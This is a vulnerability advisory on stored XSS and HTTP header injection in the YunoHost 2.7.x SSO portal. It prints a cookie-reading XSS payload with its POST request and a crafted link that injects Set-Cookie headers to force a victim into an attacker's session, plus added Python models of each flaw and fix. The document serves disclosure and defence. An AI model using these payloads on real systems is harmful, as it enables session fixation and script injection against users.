YunoHost 2.7.2 to 2.7.14 - Multiple Vulnerabilities



Product Description

YunoHost is an application that is used to manage applications hosted on a Linux server. Additionally, it allows the user to manage the entire Linux system, including installed services, firewall rules, and system updates. The application’s official website is yunohost.org. Version 2.7.2 was released on August 22, 2017, and version 2.7.14 was released on June 28, 2018.

Vulnerabilities List

Two vulnerabilities were identified within the YunoHost application:

  • Stored cross-site scripting in the SSO user profile page (CVE-2018-11348)
  • HTTP header injection in the SSO authentication page (CVE-2018-11347)

These vulnerabilities are described in the following sections.

Affected Version

Versions 2.7.2 through 2.7.14, inclusive

Solution

TBD

Stored Cross-site Scripting

The YunoHost application is affected by two cross-site scripting (XSS) vulnerabilities whose payloads are stored in the user profile. A JavaScript payload saved there is rendered back without encoding and executes inside the browser of any user who loads the affected profile page.

Vulnerability Details

CVE ID: CVE-2018-11348

Access Vector: Remote

Security Risk: High

Vulnerability: CWE-79

CVSS Base Score: 8.8

CVSS vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Two XSS vulnerabilities are located in the user profile page of the SSO user panel within the YunoHost application. The vulnerable parameters are givenName and sn: a JavaScript payload submitted in either one is stored in the profile and reflected into the page unencoded, so it runs in the session of the user who views the page. The payload below reads document.cookie, which shows that the SSO session cookies are reachable from script.

To demonstrate the attack, the following payload can be used for each parameter:

" onfocus="alert(document.cookie) a="

The request below could be used to exploit the vulnerabilities:

POST /yunohost/sso/edit.html HTTP/1.1
Host: HOST
Cookie: SSOwAuthUser=USERNAME; SSOwAuthHash=HASHVALUE; SSOwAuthExpire=TIMESTAMP

givenName=user%22+onfocus%3D%22alert%28document.cookie%29+a%3D%22&sn=user%22+onfocus%3D%22alert%28document.cookie%29+a%3D%22&mail=user%40test.com&mailalias%5B%5D=root%40test.com&mailalias%5B%5D=admin%40test.com&mailalias%5B%5D=webmaster%40test.com&mailalias%5B%5D=postmaster%40test.com&mailalias%5B%5D=&maildrop%5B%5D=
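The attribute-context injection above, and the encoding that stops it, as an added example that is not YunoHost code: a minimal model of the profile form renders givenName and sn once by plain interpolation (the flaw) and once through html.escape with quote=True (the fix), a parser-based check reports any on* attribute the rendered markup ends up carrying, and poc_form_body rebuilds the advisory's POST body with urlencode so the encoding can be compared against the request above. The field names and the payload come from the advisory; the template markup, the function names and the mail addresses are this example's own assumptions.

```python
"""Added example, not YunoHost/SSOwat code: model of the stored XSS in the
SSO profile page (CVE-2018-11348), the attribute-context fix, and a check."""
import html
from html.parser import HTMLParser
from urllib.parse import urlencode

# Decoded form of the advisory's payload (leading "user" is the field's value).
XSS_PAYLOAD = 'user" onfocus="alert(document.cookie) a="'


def render_profile_vulnerable(givenname: str, sn: str) -> str:
    """The flaw: profile attributes interpolated straight into value="..."."""
    return (f'<input name="givenName" value="{givenname}">'
            f'<input name="sn" value="{sn}">')


def render_profile_fixed(givenname: str, sn: str) -> str:
    """Same template with attribute-context encoding: quote=True turns the
    payload's double quotes into &quot;, so it can no longer close the value."""
    return (f'<input name="givenName" value="{html.escape(givenname, quote=True)}">'
            f'<input name="sn" value="{html.escape(sn, quote=True)}">')


class _EventHandlerCollector(HTMLParser):
    """Collects every on* attribute name seen on a start tag."""

    def __init__(self) -> None:
        super().__init__()
        self.handlers: list[str] = []

    def handle_starttag(self, tag, attrs) -> None:
        self.handlers.extend(name for name, _ in attrs if name.startswith("on"))


def injected_event_handlers(markup: str) -> list[str]:
    """Tokenise the markup the way a lenient browser does and return the
    event-handler attributes it contains; a correctly encoded page yields []."""
    collector = _EventHandlerCollector()
    collector.feed(markup)
    collector.close()
    return collector.handlers


def poc_form_body(mail: str = "user@test.com") -> str:
    """Rebuild the advisory's application/x-www-form-urlencoded body for
    POST /yunohost/sso/edit.html (session cookies travel in the headers)."""
    fields = [
        ("givenName", XSS_PAYLOAD),
        ("sn", XSS_PAYLOAD),
        ("mail", mail),
        ("mailalias[]", "root@test.com"),
        ("mailalias[]", "admin@test.com"),
        ("mailalias[]", ""),
        ("maildrop[]", ""),
    ]
    return urlencode(fields)


if __name__ == "__main__":
    print(poc_form_body())
    print("vulnerable:", injected_event_handlers(render_profile_vulnerable(XSS_PAYLOAD, XSS_PAYLOAD)))
    print("fixed:     ", injected_event_handlers(render_profile_fixed(XSS_PAYLOAD, XSS_PAYLOAD)))
```

The check is the useful part for verification after an upgrade: fetch the profile page with a payload stored in givenName and sn, feed the HTML to injected_event_handlers, and an empty list means the values are now encoded for the attribute context rather than merely filtered for `<script>`.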

HTTP Header Injection

The YunoHost application is affected by one HTTP header injection vulnerability. An attacker exploits it by placing a line break followed by a header line in one of the request parameters; the server copies the value into a response header without removing the line break, so the injected line reaches the client as an additional HTTP header. Such a header can set a cookie or overwrite headers that instruct the browser to protect client data. Full exploitation requires user interaction: the attacker must get the victim to open a malicious link. By combining the header injection with the stored XSS described above, an attacker can force the victim's browser into an attacker-controlled session whose profile carries the JavaScript payload, and so run that payload in the victim's browser.

Vulnerability Details

CVE ID: CVE-2018-11347

Access Vector: Remote

Security Risk: High

Vulnerability: CWE-352

CVSS Base Score: 8.8

CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

The authentication page of the YunoHost SSO is vulnerable to header injection through its r parameter, which is reflected into a response header without line breaks being stripped. The attack can be demonstrated with the following URL, which adds a fake header to the response:

https://HOST/yunohost/sso/?r=%0aFAKEHTTPHEADER:%20BADPARAMETER

The vulnerability can be used to force the victim to log into an attacker-controlled account whose profile contains the XSS payload described in the previous section. Sending the victim the following link performs the attack (Domain, SESSIONCOOKIE, TIMESTAMP and the Expires date fields are placeholders to be filled with values for the target host and the attacker's session):

https://HOST/yunohost/sso/?r=%0aSet-Cookie:%20SSOwAuthUser=jane;%20Domain=Domain;%20Path=/;%20Expires=Sun,%20DD%20Month%20Year%20HH:mm:ss%20TIMEZONE;%20Secure%0aSet-Cookie:%20SSOwAuthHash=SESSIONCOOKIE;%20Domain=Domain;%20Path=/;%20Expires=Sun,%20DD%20Month%20Year%20HH:mm:ss%20TIMEZONE;%20Secure%0aSet-Cookie:%20SSOwAuthExpire=TIMESTAMP;%20Domain=Domain;%20Path=/;%20Expires=Sun,%20DD%20Month%20Year%20HH:mm:ss%20TIMEZONE;%20Secure

In the response to the request above, the attacker-chosen Set-Cookie headers reach the victim's browser and replace the valid SSOwat session cookies (SSOwAuthUser, SSOwAuthHash and SSOwAuthExpire) with the attacker's, so the victim's subsequent requests are made in the attacker's session.
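The response splitting above and the check a fix needs, as an added example that is not SSOwat or YunoHost code: the model below concatenates the percent-decoded r value into a Location header (a simplification of the real handler, which is not reproduced here), parses the resulting response the way a lenient client does, and lists the cookies the injected lines would store; safe_redirect_target is the validation that rejects such a value. The PoC URL is shortened from the one above, HOST, jane and SESSIONCOOKIE are the advisory's placeholders, and the function names and the same-host rule are this example's own assumptions.

```python
"""Added example, not SSOwat/YunoHost code: model of the header injection in
the SSO r parameter (CVE-2018-11347) and of a validating fix."""
import re
from http.cookies import SimpleCookie
from urllib.parse import unquote, urlparse

# Constructed input, shortened from the advisory's PoC URL: a bare LF (%0a)
# followed by two Set-Cookie lines aimed at the SSOwat session cookies.
POC_URL = (
    "https://HOST/yunohost/sso/?r=%0aSet-Cookie:%20SSOwAuthUser=jane;%20Path=/;%20Secure"
    "%0aSet-Cookie:%20SSOwAuthHash=SESSIONCOOKIE;%20Path=/;%20Secure"
)


def r_parameter(url: str) -> str:
    """Percent-decode the r query parameter, as the SSO page would."""
    for pair in urlparse(url).query.split("&"):
        name, _, value = pair.partition("=")
        if name == "r":
            return unquote(value)
    return ""


def sso_redirect_vulnerable(r: str) -> bytes:
    """The flaw: r is copied into the Location header with its line breaks,
    so every newline in it starts a new header line for the client."""
    return ("HTTP/1.1 302 Found\r\n"
            f"Location: {r}\r\n"
            "\r\n").encode("latin-1")


_CTL = re.compile(r"[\x00-\x1f\x7f]")


def safe_redirect_target(r: str, host: str = "HOST") -> str:
    """Validate r before it reaches a header; raise ValueError otherwise."""
    # Check the raw string first: urlparse() silently drops tab, CR and LF,
    # so parsing before this check would hide the very bytes that split the response.
    if _CTL.search(r):
        raise ValueError("control character in redirect target")
    parts = urlparse(r)
    if parts.scheme and parts.scheme != "https":
        raise ValueError("unexpected scheme in redirect target")
    if parts.netloc and parts.netloc != host:          # assumed: same-host only
        raise ValueError("redirect target is not on the SSO host")
    return r


def sso_redirect_fixed(r: str, host: str = "HOST") -> bytes:
    """Same response, built only from a validated target."""
    target = safe_redirect_target(r, host)
    return ("HTTP/1.1 302 Found\r\n"
            f"Location: {target}\r\n"
            "\r\n").encode("latin-1")


def parse_headers(raw: bytes) -> list[tuple[str, str]]:
    """Split the head of a response as a lenient client does: a bare LF ends a
    header line just like CRLF, which is why %0a alone is enough."""
    head = raw.decode("latin-1").split("\r\n\r\n", 1)[0]
    headers: list[tuple[str, str]] = []
    for line in re.split(r"\r?\n", head)[1:]:          # skip the status line
        name, sep, value = line.partition(":")
        if sep:
            headers.append((name.strip(), value.strip()))
    return headers


def injected_cookies(headers: list[tuple[str, str]]) -> dict[str, str]:
    """Cookie names and values a browser would store from the Set-Cookie lines."""
    jar: dict[str, str] = {}
    for name, value in headers:
        if name.lower() == "set-cookie":
            cookie = SimpleCookie()
            cookie.load(value)
            jar.update({k: morsel.value for k, morsel in cookie.items()})
    return jar


if __name__ == "__main__":
    r = r_parameter(POC_URL)
    print("cookies set by the split response:",
          injected_cookies(parse_headers(sso_redirect_vulnerable(r))))
    try:
        sso_redirect_fixed(r)
    except ValueError as exc:
        print("fixed handler rejected it:", exc)
```

Rejecting the value outright is preferable to percent-encoding the line breaks: a return URL that contains control characters is never legitimate, and a rejected request leaves a clear log entry, whereas encoding would silently turn the attack into an odd-looking but successful redirect.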

Disclosure Timeline: 

  • 9/28/2017: Initial discovery in version 2.7.2
  • 7/6/2018: Vulnerabilities discovered in version 2.7.14
  • 10/30/2018: Public disclosure of vulnerabilities 

Researcher:

Florian Nivette, Security Associate at Bishop Fox 


About the author, Florian Nivette

Senior Security Consultant

Florian Nivette (CEH, CHFI, CEI, GSNA) is a Bishop Fox Alumnus who was a Senior Security Consultant at Bishop Fox, where he focused on application and network penetration testing and in-depth OS-level security. Florian is an active security researcher focusing on web applications, with a number of published CVEs (CVE-2018-11349, CVE-2018-11350, CVE-2018-11351, CVE-2018-13407, CVE-2018-11408, CVE-2018-13409, CVE-2017-77737, CVE-2017-5870, and CVE-2017-6086). He is one of the chief organizers of Nuit du Hack CTF, the largest and most well-known capture-the-flag competition in France, which draws thousands of security researchers annually.
